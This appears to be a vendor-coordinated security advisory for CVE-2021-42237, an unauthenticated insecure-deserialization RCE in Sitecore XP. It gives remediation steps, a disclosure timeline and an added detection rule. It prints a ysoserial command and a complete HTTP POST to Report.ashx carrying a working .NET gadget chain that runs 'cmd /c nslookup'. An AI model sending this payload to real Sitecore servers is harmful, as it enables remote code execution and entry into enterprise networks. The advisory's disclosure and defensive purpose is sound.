Advisory: Sitecore RCE via Insecure Deserialization - CVE-2021-42237

Nov 2, 2021


Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to remote command execution through insecure deserialization. This vulnerability can be exploited without authentication and allows attackers to execute arbitrary commands on the host machine.


An attacker can execute arbitrary commands on the host machine running Sitecore. Sitecore is typically hosted on Windows, and in many cases the machines hosting Sitecore are also joined to a Windows domain, so an opportunistic attacker could use this vulnerability as an entry point into an internal network or domain.

Affected Software

Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7

Product Description

Sitecore’s Experience Platform (XP) is an enterprise content management system (CMS). This CMS is used heavily by enterprises, including many of the companies within the Fortune 500.

Sitecore XP provides tools for content management, digital marketing, and analytics and reporting.


To remediate this vulnerability, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/ on every server instance.

The official remediation advice can be found here.

It suggests the following:

For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions:
  • Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher.
  • Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
  • Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below.

For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.

Note: The Report.ashx file is no longer used and can safely be removed.


Using ysoserial, we were able to generate a serialized payload that leads to RCE:

./ysoserial.exe -f NetDataContractSerializer -g TypeConfuseDelegate -c "nslookup" -o base64 -t

The final payload to get command execution looks like the following:

POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1
Host: sitecore.local
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Connection: close
Content-Type: text/xml
Content-Length: 5919

<?xml version="1.0" ?>
        <parameter name="">
            <ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089"
                <Count z:Id="2" z:Type="System.Int32" z:Assembly="0"
                <Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0"
                    <_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0"
                        <Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0"
                            <a:assembly z:Id="6">mscorlib, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>
                            <a:delegateEntry z:Id="7">
                                <a:assembly z:Ref="6" i:nil="true"/>
                                <a:delegateEntry i:nil="true"/>
                                <a:methodName z:Id="8">Compare</a:methodName>
                                <a:target i:nil="true"/>
                                <a:targetTypeAssembly z:Ref="6" i:nil="true"/>
                                <a:targetTypeName z:Id="9">System.String</a:targetTypeName>
                                <a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
                            <a:methodName z:Id="11">Start</a:methodName>
                            <a:target i:nil="true"/>
                            <a:targetTypeAssembly z:Id="12">System, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>
                            <a:targetTypeName z:Id="13">System.Diagnostics.Process</a:targetTypeName>
                            <a:type z:Id="14">System.Func`3[[System.String, mscorlib, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
                        <method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
                            <Name z:Ref="11" i:nil="true"/>
                            <AssemblyName z:Ref="12" i:nil="true"/>
                            <ClassName z:Ref="13" i:nil="true"/>
                            <Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature>
                            <Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2>
                            <MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType>
                            <GenericArguments i:nil="true"/>
                        <method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
                            <Name z:Ref="8" i:nil="true"/>
                            <AssemblyName z:Ref="6" i:nil="true"/>
                            <ClassName z:Ref="9" i:nil="true"/>
                            <Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature>
                            <Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2>
                            <MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType>
                            <GenericArguments i:nil="true"/>
                <Version z:Id="23" z:Type="System.Int32" z:Assembly="0"
                <Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"
                    <string z:Id="25"
                        xmlns="">/c nslookup</string>
                    <string z:Id="26"

The above payload will execute cmd /c nslookup.
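For defenders who cannot remove Report.ashx immediately, or who want to confirm nothing is still reaching it, the following is an added example (not Assetnote's or Sitecore's code) of a request inspection rule built from the signals in this advisory: any request to the Report.ashx handler, and NetDataContractSerializer type hints in the body naming the delegate and Process types seen in the payload above. The sample body is constructed for the test and carries the type hints only, not a working gadget chain.

```python
import re

# Path of the unauthenticated handler this advisory says should be removed.
REPORT_ASHX = "/sitecore/shell/clientbin/reporting/report.ashx"

# Type names that a legitimate report request has no reason to carry; they are
# the building blocks of the delegate gadget chain shown in the advisory.
SUSPICIOUS_TYPES = (
    "System.DelegateSerializationHolder",
    "System.Reflection.MemberInfoSerializationHolder",
    "System.Diagnostics.Process",
    "System.Collections.Generic.SortedSet",
    "System.Collections.Generic.ComparisonComparer",
)

# NetDataContractSerializer reads the CLR type to instantiate from z:Type and a
# surrogate factory from z:FactoryType, both of which come from the request body.
_TYPE_HINT = re.compile(r'z:(?:Type|FactoryType)="[^"]*"')


def has_type_hints(body):
    """True if the body carries NetDataContractSerializer type hints at all."""
    return _TYPE_HINT.search(body) is not None


def suspicious_types(body):
    """Return the gadget-chain type names present anywhere in the body."""
    return [name for name in SUSPICIOUS_TYPES if name in body]


def inspect_request(method, path, body):
    """Classify one request; any hit on Report.ashx is notable after the fix."""
    hits_report = path.split("?", 1)[0].lower() == REPORT_ASHX
    types = suspicious_types(body) if hits_report else []
    if hits_report and has_type_hints(body) and types:
        verdict = "block"   # deserialization gadget indicators in the body
    elif hits_report:
        verdict = "alert"   # handler should no longer exist; any access is notable
    else:
        verdict = "allow"
    return {"verdict": verdict, "report_ashx": hits_report, "types": types}


# Constructed fragment for demonstration only: type hints without a gadget chain.
SAMPLE_BODY = ('<?xml version="1.0" ?><parameter name="">'
               '<x z:Type="System.Collections.Generic.SortedSet`1[[System.String]]">'
               '<y z:FactoryType="a:DelegateSerializationHolder" '
               'z:Type="System.DelegateSerializationHolder"/></x></parameter>')
```

The rule deliberately treats a plain GET to Report.ashx as an alert rather than noise: once the file is removed per the remediation above, there is no legitimate reason for any client to request it.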

Blog Post

The blog post detailing the discovery process for this issue can be found here.


Assetnote Security Research Team


  • 20/09/2021 - Reported to Sitecore
  • 23/09/2021 - Initial response from Sitecore
  • 08/10/2021 - Advisory published on Sitecore website
  • 02/11/2021 - Blog post published on Assetnote blog